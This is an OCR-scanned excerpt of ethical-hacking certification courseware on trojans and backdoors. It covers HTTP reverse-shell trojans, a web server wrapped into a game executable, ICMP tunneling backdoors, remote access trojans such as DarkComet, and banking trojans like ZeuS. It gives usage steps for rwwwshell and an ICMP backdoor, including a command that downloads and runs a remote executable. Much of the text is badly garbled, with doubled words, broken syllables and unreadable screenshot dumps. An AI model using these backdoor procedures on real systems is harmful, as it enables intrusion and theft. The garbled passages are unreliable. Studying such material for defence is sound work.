HTTP/HTTPS Trojans HTTP/HTTPS Trojans can bypass any firewall, and work in the reverse way of a straight HTTP tunnel. They use web-based interfaces and port 80. These Trojans are executed on the internal host and spawn a child every day at a certain time. The child program appears to be a target to the firewall which, in turn, allows it to access the Internet. However, this child program executes a local shell, connects to the web server that the attacker owns on the Internet through a legitimate-looking HTTP request, and sends it a ready signal. The legitimatelooking answer from the attacker's web server is in reality a series of commands that the child can execute on the machine's local shell. All traffic is converted into a Base64-like structure and given as a value for a cgi-string, so the attacker can avoid detection. The following is an example of a connection: Slave: GET/ ET/ cgi - bi n/ or der der ? M5mAej TgZ TgZdgYO dgYOdgl dgl OOBqFf VYTgj YTgj FLdgxEd FLdgxEdbl bl He7kr e7kr j HTTP/ TTP/ 1. 0
Al f bknz Master replies with: gSm The GET of the internal host (SLAVE) is just the command prompt of the shell; the answer is an encoded "Is" command from the attacker on the external server (MASTER). The SLAVE tries to connect daily at a specified time to the MASTER. If needed, the child is spawned because if the shell hangs, the attacker can check and fix it the next day. In case the administrator sees connections to the attacker's server and connects it to himself, the administrator just sees a
Module 06 Page 896
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
broken broken web server serv er because there is a token (password) in the encoded cgi cgi GET request. request. W W W proxies (e.g., squid, a full-featured web proxy cachel) are supported. The program masks its name in the process listing. The programs are reasonably small with the master and slave programs, just 260-lines per file. Usage is easy: edit rwwwshell.pl for the correct values, execute "rwwwshell. "rwww shell.pl pl slave" on the SLAVE, SLAVE, and and run run rwwwshell. rwww shell.pl" pl" on the MASTER just before before it is the time at which the slave tries to connect.
FIGURE 6.24: Victim's system infected with HTTP Trojans
Module 06 Page 897
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
HTTP T ro roja jan: n: HTTP RA RAT Infect the victim's computer with s e r v e r . exe and plant plant HTTP HTTP Trojan Trojan The Trojan sends an email with the location of an IP address
Connect to the IP address using a browser to port 80
e
Displays ads, records personal data/keystrokes
»
Downloads unsolicited files, disables programs/system
© Floods Intern et connection, connection , and and distributes threats © Tracks browsing activities and hijacks Internet browser 6
Makes fraudulent claims claims about spyware detection and removal
Copyright © by EG-GMMCil. All Rights Reserved. Reproduction Reproductio n Is Strictly Strictl y Prohibited.
HTTP Tro jan : HTTP RAT RAT RATs are malicious programs that run invisibly on host PCs and permit an intruder remote access and control. A RAT can provide a back door for administrative control over the target computer. Once the target system is compromised, the attacker can use it to distribute RATs to other vulnerable computers and establish a botnet. The RAT enables administrative control and makes it possible for the attacker to watch all the target's actions using keyloggers or any other spywares. An attacker can also implement credit card fraud, identity theft using confidential information, and can remotely access web cams and video recordings, take screenshots, format drives, and delete, download, and alter files. It can't be detected as it works like genuine programs and it is not easily noticed.
Module 06 Page 898
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
□
HTTP RAT 0.31
r• 'bJ r iIxk XMkdoor TTP TTPWebserver RAT Webserve r /b y zOmb zOmbie ie
vfl.31
Infect the victim's computer with
<*>
KM xr nlM
iWngi
ser ver . exe exe and plant HTTP Trojan The Trojan sends an email with the location of an IP address
& tend noM1c*hon wtfh p •ddrett 10 rnal
©
SMTP t a w 4 servin serving g mat u c4n specrfyt«v« 4l s « w t detntfod Mrih .
I B S H S B S S 8 S S 9 ---y o u « m d « t t *1 s (you@mad ca n
P cteeFwWA cteeFwWA
<2>
Connect to the IP address using a browser to port 80
t»ve»portf86
Victim
A
Generates |
ser ver .exe .exe : using HTTP HTTP RAT :
w»kom» 2 HTTP_RAT infected computer >:]
«I'ynr I'ynrwgmtiiM tiiMl
rti rti hi■1 »«l
mhi. m1»nn■ml
Attacker FIGURE 6.25: Attacker infecting Victim's system using HTTP RAT
Module 06 Page 899
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
Shttpd Trojan - HTTPS (SSL)
CEH
0
0
J
SHTTPD SHTTPD is is a sma small ll HTTP Server that that can can be embedd embedded ed inside inside any any program
J
It can can be wrapped wrapped with a genuin genuine e program program (gam (game e chess .exe), when executed it will turn a computer into an invisible web server
0
0
Normally Firewall allows you through port 443
Attacker
Encrypted Traffic
Victim IP: 10.0.0.8:443
IP: 10.0.0.5:443
Connect to the victim using Web Browser
Infect Infect the the victi victim's m's computer computer with with c h e s s . ex e
http://10.0.0.5:443
S h t t p d should be running running in in the backgroun background d listening on port 443 (SSL)
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
Sh ttpd T ro ja n - HTTPS (S (SSL) o -fr-a -fr-a
Shttpd is a small HTTP server that can easily be embedded inside any program. C++ source code is provided. Even though shttpd is not a Trojan, it can easily be wrapped with a chess.exe file and it can turn a computer into an invisible web server. 0
Infect the target's computer with chess.e chess.exe. xe.
0
Shttpd Shttp d should be be running in in the background listening li stening on port 443 (SSL).
0
Connect to the target usin using g a web browser: bro wser: http://10.0.0.5:443. http://10.0.0.5:443.
Attacker
Normally Firewall allows you through port 443
6 Encrypted Traffic
IP: 10.0.0.5:443
Victim
IP: 10.0.0.8:443
Connect Connect to the victim using using Web Browser http://10.0.0.5:443
Infect Infect the victim's computer with chess . ex e Shttpd should be running in the background listening on port 443 (SSL)
FIGURE 6.26: Attacker infecting Victim's system using Shttpd Trojan Module 06 Page 900
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
ICMP Tu nneling nneli ng J
Co ve rt c ha nn els are me tho ds in w hic h an att ack er ca n hid e t he dat a in a pro toc ol
47)
that is undetectable J
Th ey rely on t ec hn iqu es call ed tu nn elin g, wh ich all ow on e pro toc ol t o be car rie d over ano ther protocol protocol
J
V
IC M P tu nn eli ng uses IC M P e cho -re que st a nd repl y to ca rr y a pa ylo ad and stealthily access or control the victim's machine
ICMP Client (Command:
ICMP Trojan: icmpsend
ICMP Server (Command:
i cmpsend psend ) &
i cmpsrv - i nstal stal l )
Command Prompt
0
C:\Documents and Sett»>gs\Adm1n1strat0f.VIND0WS\Deskt0p\l CMP Backdoor Win32>1cmp Send 127 0 0 1 —( ICMP-C md vl .O b eta , by gx iso ne ]— -i
—{ —{
E-mail E-mail::
g^ grK tf hotmail.wm w m ]2012/B/15 2012/B/151— 1—
Us Usag ag e: icmp sen s en d Remo telP telP CtrHC or Qfq to Quite H/h for help 1c1ap-caco>H
[http://127.0.0.1/hack,exe e xe =admin exe] 32> [psltst] [pski■ [pski■ ID] ID] Co mman d
Commands are sent using ICMP protocol
Command Prompt
C:\Docunwnts and Settilngs\Admlnlstrator.VINDOWS\Desktop\ICMP Backdoor Wln32>kmp
—{
ICMP-Cmd vl.O beta, by gxlsone }—
-i
2012/»/15 2012/»/15
b~
Usage: Icmpsrv -in stall kmpsrv -remove Transmitt ing FUa- Success I Creating ng Service - Success I Starting Service _ Pending _ SuccessI C:\Documents and SettingsVWmln»str«tor.VINOOWS\DesfctopVlCMP SettingsVWmln»str«tor.VINOOWS\DesfctopVlCMP Backdoor Win32
Cbpyright © by EC-CMICil. EC-CMICi l. All Rights ^gServed. Reproduction Reproduct ion is Strictly Stri ctly Prohibited. Prohibit ed.
ICMP Tunneling The concept of ICMP tunneling is simple since arbitrary data portion of ICMP_ECHO and ICMP_ECHOREPLY packets is contains a covert channel that can be destroyed due to tunneling. the contents of ICMP_ECHO traffic, making the use of this channel
information tunneling in the possible. ICMP_ECHO traffic Network devices do not filter attractive to hackers.
Attackers simply pass them, drop them, or return them. The Trojan packets themselves are masquerading as common ICMP_ECHO traffic. The packets can encapsulate (tunnel) any required information. information. Covert channels are methods in which an attacker can hide the data in a protocol that is undetectable. They rely on techniques called tunneling, which allow one protocol to be carried over another protocol. A covert channel is defined as a vessel through which the information can pass, and it is generally not used for information exchanges. Therefore, covert channels cannot be detected by using standard system security methods. Any process or bit of data can be a covert channel. This makes it an attractive mode of transmission for a Trojan, since an attacker can use the covert channel to install the backdoor on the target machine.
Module 06 Page 901
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
ICMP Trojan:
ICMP Client
ICMP Server
icmpsend
(Command:
(Command:
icmpsend Cvictim ip>)
icmpsrv -install)
Command Prompt
Command Prompt
C:\Documents and S«ttlngs\Admlnistrator.VINDOWS\Desktop\l CMP Backdoo r Win32>i Win32>icmp cmp Send 127.0.0.1 =====w«ico«ne to ww>v.hachgrxfil*s.n«====== —[ ICMP-Cmd v1 0 beta, by gxisone J— —{ E-mail: l:
Commands are sent using ICMP protocol
qxisone@hotmail com ]—
—C
Command ICMP-CMD
—
-Welc ome to to www.tiat www.tiat ketxfiles.net—— — —
— [
ICMP-Cmdvl.O beta, bygxisone ]—
— [
F-mdil: [email protected]
-[
[http:/n 27.0.0.1/hack.exe =admin.exe] [pslist]
Srv -install
2012/8/15]—
Usage: icmpsend RemotelP Ctrl+C or Q^q to Quite H/h for help ICMP-CMD>H
[pskill ID]
C:\Documents and Settiings\Admini3trator.VVJDOWS\De9ktop\ICMP Backdoor Win32>icmp
2012/8/15
]—
J---
Usage: Ian Ian psrv- install Icmpsrv -re move <1.0 remov e service> Transmitting File .Success I Cieating Service _. Success I starting Serv ice... Pending... success! c:\Docum ents and Settings\Admi nistrator. v!Ntx)Wb\Desk v!Ntx)Wb\Desktop\1C top\1C M’Backdoor
FIGURE 6.27: ICMP Tunneling
Module 06 Page 902
Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
R em ote A ccess T rojan s
CEH 1 1 1
Attacker gains 100% I_______ (complete) access to the system _________
Rebecca Victim Infected with RAT Trojan Trojan
J
This Troja rojan n work works s lik like e a remote remote desk desktop top access
1.
Infect (Rebecca's) compu ter with server.exe and plant Reverse Connecting Trojan
J
Hack Hacker er gains ains comp complet lete e GUI GUI acc acces ess s to the remote system
2.
The Trojan Trojan connects to Port 80 to the attacker in Russia establishing a reverse connection
3.
Jason, the attacker, attacker, has comple te control over Rebecca's machine
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Reproducti on is Strictly Stri ctly Prohibited. Prohibi ted.
Rem ote Access Trojans 1 —1 — Remote Rem ote access Trojans provid pr ovide e full contro con troll over ove r the targe tar get's t's system syst em to attacker atta ckers s and enables them to remotely access files, private conversations, accounting data, and so on in the target's machine. The remote access Trojan acts as a server, and listens on a port that is not supposed to be available to Internet attackers. Therefore, if the target is behind a firewall on the network, there is less chance that a remote attacker would be able to connect to the Trojan. Attackers on the same network located behind the firewall can easily access the Trojans. Examples include the Back Orifice and NetBus Trojans. Another example, the Bugbear virus that hit the Internet in September 2002, installed a Trojan horse on targets' systems, giving access to sensitive data to the remote attackers. This Trojan works like a remote desktop access. The attacker gains complete GUI access to the remote system. The process is as as follows: 1.
Infects (Rebecca (Reb ecca's) 's) computer comput er with server.exe and plants Reverse Connecting Trojan.
2. The Trojan connects to Port Po rt 80 to the attacker atta cker in Russia Russia establishing a reverse connection.
Module 06 Page 903
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Trojans and Backdoors
3. Jason, the attacker, has complete compl ete control over ove r Rebecca's machine.
Jason Attac Attacker ker Sitting in Russia
Attacker gains 100% (complete) access to the system
Rebecca Victim Infected with RAT
FIGURE 6.28: Attacker infecting victim's machine using Remote access Trojans
Module 06 Page 904
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
R e m o t e A c c e s s T r o j a n : RAT D a r k C o m e t a n d A p o c al a l y p se se hSodi
D
r c ll 1z .
E?
7> Wan/Qian]: Port
11 1668 MctnwF. ctnwF. . . 92G VicbmesF. . L 9CC VictmejF... . YlcomesF.. IU1012■viamesF. . . Uctme*F. . . 132•* \pm«F... u 18C4 V
u1:128 \
•
■ 59/[192.1... 5.154 5.154 f [192... ♦2.43/[192... ♦2.43/[192... LSC60T-HI / C<*is3'2 *6.142 / [192... .. • 27/ [192.1. . 0IIV2/SYSTEM 138/[:92.... AfJTHOHYLOPSZ f 5ys.. . PC-OESHCLGO/Sho... •6. 136/] 192.... ANTHONYLOP YLOPEZ / u *. .. • 150 150/] 192.... SNAKE-E7D71CD4A I f . . . DIV2 / Acrr»n>itr*t*ur 27/ ] 192.1... PC■0CSHXEX3/ Sho... •6.28/] 192.... • ♦2.43/] 192... PCOS-MOI / rxx • 55/] 192.1... SNAKE137CO-PC/« ** .. . PC0 6 •A •ALEX / AL ALEX .07/ [192.1... TTANCtM TTANCtM / Adnrwf r«... - m *4/[192.16... L5C0OT-III 0OT-III / SYSTEM tm .46.142 /[192... DAMJEN-PC 1 d*n*c • • 172 172/] 78.2... •
-
• •
Windows Wndore Wndov•1 Window windows windows Window* Wrtdows W«do/tt Windows Wndo v* V fe fe do do w• w• W*d0W WHdOWS
23/] 192 ..
•
• •
- • Sl/[192.1... .07/[192.1...
Wndo%*ff99 Window S Wndo. »
OAVIDOURS-PC/ D *v . PC-OC-AlOC/ SYSTEM
moo
?*1
v
Trr ». • D»t
D
IP WAN/&.AN] : Pert Pert
19:14c37/:2/03/2010 19:14•38/: 2/03/20:0 19; 14.•0/: 2/03/20:0 19:14:44/12/03/2010 19:14t 19: 14t44/12/03/20:0
VKQmesf... VKQmesf... • V1
vtcomesF... VkbfnesF... Lpdat* Lpdat*
• • * • •
I■ • * - ^
tm%•
• •
• •.
] Status: Status: Kt*rtng. Kt*rtng.
Copyright © by EC-ClllCil. All Rights Reserved. Reproduction is Strictly Prohibited.
Rem ote A ccess Trojan: Trojan: RA R A T D arkC om et and Apocalypse DarkComet is a tool that allows you to remotely access the administrative controls and privileges of an infected machine without the user's knowledge or permission. It provides you with access to processes, registry, command prompts, webcams, microphones, applications and can even provide a keylogger whenever you use the system.
Module 06 Page 905
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
t DarkComet•RAT v 2 j0 RC3 •Uset(s): 21
IPWan/lL /lLan]: Port C0"t>ut*r Htm Htmt/j t/jtvU tvU... OS .Vr^5Ses«o [7600] *• • * 59/(1921... S0RAr*5/$y»t*me /164. ... K0 C4tAC^/5r5T»r wnd»* a - 192] /164. nd»**vataSarvica... wmoorteV«USarvKt... t... • 4:.43/[l»2. 4:.43/[l»2..... ^C-OC-MOI/SYSTCV $e v>ceP.. eP.... • — at.143 143/(*2 /(*2.... .SOOOT-Xn/daee*42 vvw!d»M« $ev .VrxS>.SX .SXPSer..-ce ceP... P... •a•• 27/(1921... DIMZ/SOTM • • 136/[192.... ANTWa0PK/Sy* PK/Sy*... ... •..•n .•ndoA«Sr.«n A«Sr.«n [7600] Wndov«v«staServe*... •6.28/] 192 .. ?Ct€ SH(XOt3/Sfo... • « 136/ [192.... AWTHC^YL0P€2/utl.. tl.... \Mndb \Mndb«S «Se*n e*n[7600] P.. . • • 150/[192.... SNAKE■C7071C04Aif... Vrx»A5XPS«r,ic*P... A4rrv*»?ete1r e•• e• • %27/ [1921 [1921... ... 5IMT/ A4rrv*»?ete1r XPSert-c ert-ce F... -5.28 /[192— 9C-0e-5HOtEXJ/»a... ..' ..' vata Servtca*. *.> >0... v.rxtoA'Svata Service... /bo wometf. tf. • 42.4 .433/[1 /[1M... ?C-O -OE-MOI bo 55/(1921... 1... S*iAc».. • .07/ .07/(1 (192 921. 1... .. ^C06*A^X/ Ai£X u'n&r;* vat»Se -ceP... ... vomesF. esF. - • 444/ 4/[1 [192 92.1 .16. 6..... TITANnx/ Ad Tr**fa... Tr**fa... Y.Vxto jvsx? Ser.-c vorxsF. • - 6. v.rx^Ai x? Se . ce P... 6.142/[192... .S080T-m/SYST& .VrxJa -Se5 .»T1]7600[ McOmaaP. « « • 172/[ 172/[78 78.2... 5AV»iPC.'dan«r vvtimeeP. - aa %51/(192.1... DAVZXXftS^C ^ ... • ^. sS e. t« [7600] vscttmeaP. aa • v07/ [192 1... ... 9C-0EA^X v.nd»Ac*. Sev>c*.. 9C-0EA^X// SYSTS4 ^ 0 ^ »48 UV«4vKVO(any*S t^an m tm e>0/ • t^a IPWAN/ILAN]:P0rt TweyOate ID 19: 14:37/12/03/2 /03/2010 VXtjmesF... - - :3490 i* ” 34» 19: 14:38/12/03/2010 Vg... OoanPort(•) Q SendOrder* t So*
1 1668 M 920 100 J 100 .4 M .4 MO 111012 n»44 v 1924 . 1040 I 11076 11076 i 1104 . 13*0 .. 1092 1 1 1030 1 11116 i 1344 » 564 M !!260 260 i 11240 I ■1129 . 4 *cton
10 vyomwF. VKCmuP. vxomeeP. vkemeaP. WOmesF. VmesF. vxtmwP. VKtmejP.
A. X X X X X X X X X X X X X X X X X X V
C Png :09*5 X 94MJ x :66 N, x 93M* 78Ms 343NS x 173* 360M* 47MJ 93Mj x 93Ms x :33.VS 79Mj x 63M5 171M* x 93MS x :72M» 07*■ Mf X :25MS
ActiveCaptMn 0. * 21294s 69 IS 8747* Progam 5274* Proga 4730* 340365 1S45S1 81s 142* 4731* 15456s avast1 •Avertasemeot ertasemeot 719s avast1 153Is ■•> DIDIERRIOLCCXRT. 3415 DI __ __ __ 36305 SRO.Oent S2305 Lacreca^ eaVye( ... 05 0• Total Conma«der 7.5 .50. 0..... 76S01S an Act%«Cap6 «Cap60n DIUIERRI0UC0URT<» • 8hotma<.com> WO.Oent :at :at
»•*> ^•®notma<.fr> lare < •/ »•*>^•® ' Toia Commander 7.50pubfcbe cbe.o6 .o6 M»d»etMetth.. ■ 1
FIGURE 6.29: RAT DarkComet Screenshot
Apocalypse Remote Access Trojan is a tool that allows you to modify the entire registry and allow .dl files to run executables. This runs in invisible mode when it is executed.
Ap oca lyp se Rem ote Ad m in is tr ati on Tool v l .
4.4 1 -
V let ton Onl ine
A ~ Connections
Brooded Brooded .j Settngj ettngj / Bulder X* SUtsbcs About a O Irtformahcn tformahcn Coinputer er Name Username Server© Wan f | PCWormebon 0 4 p0 p0crfypse_8C9C6S15 ECC273FF53A.. Hectors Hectors . . Server WornMbon Instale InstaleddAppfcattons ActivePorts ctive Ports >< Message Hoi Server K) apOcalypse C C b . . . . U X a 5) Accessories M«1*9«Bo . Uniag- Lai RemoteDesktop 41 MessageIcon Icon JK JKr,-. WebcamCapture ■4 ®OK C' Rw-y Cancol O ym. no > AucfcoCapture :ajKaytoggar 0«C4rc^ OY« No Cvcol O M>o» Rrty Ignc. Orkie Orkie Keylogger 0 Offtne Offtne Keytoggat 0 Mwmim■ I * CofWMvabon* 8 Jp Chat Server © SandMessage B ^Managers Me Manager 3 MeSearch Search Imtall ed Applications Server V : *pOcolypte BC9C6b1b 1 )1 0 0 t H O 0.1 fTi fTi f& y ) RemoteO oteOowrtoed Pegstry Edtor DisplayName Version UrmstelStmg * Opboard OpboardManager c:\ProgramFies\CommonM OAtfabeAB( AdobeSystems SystemsInc ClpboardTex ClpboardText AlchemyRemote £>ecutor *C:\F»o^ :\F»o^arr>FtasVA arr>FtasVAkhemyR fie ClpboerdMat Ij Update far wndomXP(1*911164) l“ Mcroaoft Corporation rporation O StaticManager ticManager )3.4.0 (arHJS C:\PtogramF«es\MuAaFeel IMh Service ServiceManager TrWSQlyog 8.55 ) 55 C\P»ogramMes\SQlyogTri es\SQlyog Tri WabyogSoftworfePvt.Ud. C\P»o Process ProcessManager ModJes 0 Romanfrxsd anfrxsdon on (Rotas) *c:\wempVjransOOO.exe* “ WindowManager C:\PtogranPtes\w»P<**1 C:\PtogranPtes\w»P<**1* Tectnoioges es 4.1.0-2001 CACETectnoiog CommandPrompt ■ C:\Pro* C:\Pro*an Ffes\w*RAAUs C VlAnRA AnRARactever O Explorer Sattngs jWebttfr ttfrsX sXP Mcrotoft crotoft Corporation .S . S -, B * * f%jgr xe/I{AC766Ad6-7 AdobeSystems Incorpora.. Incorpora.... MsCxec.exe/I * J Adobe Raader . PasswordManager s* PasswordM MaF 10 f a a n HAIMTTTMI9 ,HAM« AM«Aft
12700.1
?
8961127 001912700.1
r
2.0.3.13070 M0ilaFre#0 ilaFre#0■(3 60)
S
F^Shif *4
a O Contact Us Webste £
93.3
90723
rwtale^ppkahor^^ecer^e^
I About NoConnecbon
FIGURE 6.30: 6.30: Apocalypse Screenshot
Modu le 06 Page 906
Ethical Hacking and Counte rmeasu res Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
93.3 .
1% »
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
C overt C h an n el T rojan: CCTT I C EH J
Covert Covert Channe Channell Tunne Tunneling ling Tool ool (CCTT (CCTT)) Troj Trojan an presen presents ts variou various s exploit exploitatio ation n techniqu techniques, es, creating arbitrary data transfer channels in the data streams authorized by a network access control system
J
It enables enables attack attackers ers to get get an an external external server shell shell from from within within the intern internal al network and and vice viceversa
J
It sets sets a TCP/UDP/HTT TCP/UDP/HTTP P CONN CONNECT ECT | POST channel allowing allowing TCP TCP data data stream streams s (SSH, SMT SMTP, P, POP, POP, etc...) between an external server and a box from within the internal network
Client
Proxy Chain
CCTT Server
Copyright O by by EG-Gllincil. All Rights Reserved. Reserved. Reproduction is Strictl y Prohibited
Covert Ch ann el Trojan: Trojan: CCTT The Covert Channel Tunneling Tool is a hidden channel tool. It provides you with many probable ways to achieve and allow arbitrary data transfer channels in the data streams (TCP, UDP, HTTP) authorized by a network access control system. A Covert Channel Tunneling Tool (CCTT) Trojan presents various exploitation techniques, creating arbitrary data transfer channels in the data streams authorized by a network access control system. It enables attackers to get an external server shell from within the internal network and vice versa. It sets a TCP/UDP/HTTP CONNECT|POST channel allowing TCP data streams (SSH, SMTP, POP, etc...) between an external server and a box from within the internal network.
Client
Target Services
FIGURE 6.31: Covert Channel Trojan Module 06 Page 907
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
E -ba -b a n k in ing g Troj a n s
CEH
imttiM
tUx* l NmIm
E b a n k i n g T r o j a n s E-banking Trojans are very dangerous and have become a major threat to the banking transactions performed online. This Trojan is installed on the victim's computer when he or she clicks the email attachment or clicks on some advertisement once the target logins in to the banking site. The Trojan is preprogrammed with a minimum range and maximum range to steal. So it doesn't withdraw all the money from the bank. Then the Trojan creates screenshots of the bank account statement; the victims aren't aware of this type of fraud and thinks that there is no variation in their bank balance unless they check the balance from other systems or from ATM machines. Only when they check the balance will the differences be noticed. The following diagram explains how the attack is carried out using E-banking Trojans.
Module 06 Page 908
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Malicious advertisements published among the legitimate websites
Uploads malicious advertisements
User access to infected website
Malware Server '
‘ W User redirects to malicious exploi exploitt kit kit
^
The website is redirected redirected to —• • the maNciou maNciousex sexplo ploit it kit kit 4 W
Legitimate Websites
Trojan reports for a new bot Sends instructi on to the Troj,
s.
^0
The User's PC PC exploited
^ Trojan reports user activities
Attacker
’*
r
9# !
$ | JI] |
w Instruction to manipulate banks transactions
User access bankA/C
Manipulates Manipulates user's user's bank bank transaction
■>2#
Control and Command Server A
Reports about successful/failed transaction
Financial Institution FIGURE 6.32: illustrating the attack using E-banking Trojans
Here the attacker first infects the malicious advertisements and publishes publishes these advertisements among genuine websites. When the victims access the infected website, it automatically redirects him or her to a website from where the exploit kit gets loaded onto the victim's system. Thus, the exploit kit allows the attacker to control what is loaded in the victim's system and used for installing a Trojan horse. This malware is highly obfuscated and can only be detected by few anti-virus systems. The system of the victim is now a botnet from where the Trojan easily sends and receives instruction from the control and command server without the knowledge of the victim. When a victim access his or her bank account from the infected system, all the sensitive information, i.e., used by the victim in accessing account information such as login credentials (user name password), phone number, security number, date of birth, etc. are sent to the Control and Command Server by the Trojan. If the victim is accessing the transaction section of the banking website for performing online transactions, then the data that is entered by the victim on the transaction form is sent to the Control and Command Server instead of to the bank website. The control and command server system analyzes and decodes the information and identifies suitable money mule bank accounts. The Trojan receives instructions from the control and command server to send the latest transaction form that is updated by the control and command server serv er to the bank for transferring transferr ing money to the mule account. Confirmation from the bank about successful/failed transaction of the money that was transferred is also reported by the Trojan to the control and command server.
Module 06 Page 909
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
B anki an king ng Trojan A n a lysi ly siss
I
CEH
(•rtifwtf (•rtifwtf
e
Trojan Trojan intercepts valid entered by a user
0
It replaces the TAN TAN with a random number that will be rejected by the bank
ItkNjI Nm Iw•
I
Q Attacker can misuse the intercepted TAN with the user's login details
Trojan creates fake f ake form fields fi elds on e-banking e-banking pages Additional fields elicit extra information such as card number and date of birth Attacker Attack er can use this information informati on to impersonate and compromise victim's account account a
Trojan Trojan analyses POST requests and responses to victim's browser
a
It compromises the scramble pad authen ticatio n
a
Trojan Trojan intercepts scramble pad input as as user enters Customer Number and Personal Access Code
Copyright © by EG-G*ancil. EG-G*ancil. All Rights Reserved. Reproducti on is Strictl y Prohibited.
B anking T roj rojan an Analysis Analysis A banker Trojan is a malicious program that allows obtaining personal information about users and clients using online banking and payment systems. A banking Trojan analysis involves the following three basic types: Tan Gabbler: A Transaction Authentication Number (TAN) is used for authenticating the online
banking transaction, which is a single-use password. The banking Trojan explicitly attacks the target's online banking services that depend on the TAN. When the TAN is entered, the Trojan grabs that number and changes that number with any random number that is incorrect and rejected by the bank. The content is filtered by the Trojan and the incorrect number is replaced in order to satisfy the target. An attacker can misuse the intercepted TAN with the target's login details. HTML Injection: This type of Trojan creates duplicate fields on the online banking sites and
these extra fields are used by the attacker to collect the targets account details, credit card number, date of birth, etc. Attackers can use this information to impersonate and compromise the target's account. account. Form Grabber: This is an advanced method of collecting data from the Internet available on the
various browsers. This is highly effective in collecting the target IDs, passwords, and other sensitive information.
Module 06 Page 910
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
E b a n k i n g T r o j a n : Z e u S a n d S p y E y e J
The main objective of ZeuS and SpyEye Trojans is is to steal bank and c redit card acc ount informatio n, ftp data, and other sensitive information from infected computers via web browsers and protected storage
J
SpyEye can automatically and quickly initiate an online transaction
C EH
ZeuS Control Panel Builder Configand loader tuldn g Sou c9corfig file:
SpyEye
' :i Hnri !rents and and
|
Edit conFg
] (
Bjild l d corFi corFijj
]
M
o
^^J J fl flnO nO WO
jl
Statist Stati stiic
Setti Setti ngs ngs
J
Output L00dr>3 conFlg fromfilo 1 C:\D C:\D00 jrnorts jrnorts ond aemnQSl K 0 bayaih\ Destt op\ rr oyanoJ »j: »j : AZeu5\ bM l \ ccnf 1Q. M Loodng succoododl
craacinol oader fi e\ :\ l >0: :urrentsar1c
Soltlngs\Koboya5h\DosW:op\rrovano ZouSVdr.oxo1.
bol neHMAINI
trr»r_ccnfig-3SOCOOO, 60000 tm sr J 0as-*>ui)ui). touuu trror_ 5tate- 60000 ,200000 /203.H 2.10.2/
( ’pJNMtvJa t hr! ', /*vox miorrtoft-Anvlowi 0
Ooyou*••) *anrtoMrm
CK
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
E b a n k i n g T r o j a n : Z eu euS S a n d SpyE ye ZeuS Source: http://www.secureworks.com ZeuS is a latest threat for online banking transactions as it uses both form grabber as well as keystroke logging. It is mainly spread through drive-by downloads and phishing schemes. The ZeuS botnet targets only Windows. New version of ZeuS even affects Windows Vista. It has evolved over time and includes a full arsenal of information stealing capabilities: © Steals Steal s data submitte subm itted d in in HTTP for forms ms 0
Steals account credentials stored in in the Window s Protected Storage
Q Steals clientclient-side side X.509 X.509 public key infrastructure infrastru cture (PKI) certificates certifica tes 0
Steals FTP and POP account accoun t credentials credent ials
Q Steals/ Ste als/del deletes etes HTTP HTTP and Flash cookies cooki es 9
Modifies the HTML pages pages of target websites for information stealing stealing purpos purposes es
9
Redirects targets from target targe t web pages pages to attacker attack er controlled contro lled ones
Q Takes screenshots screensho ts and scrapes HTML from target sites sites
Module 06 Page 911
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
9
Searches Searche s for and uploads files from the infected computer comp uter
9
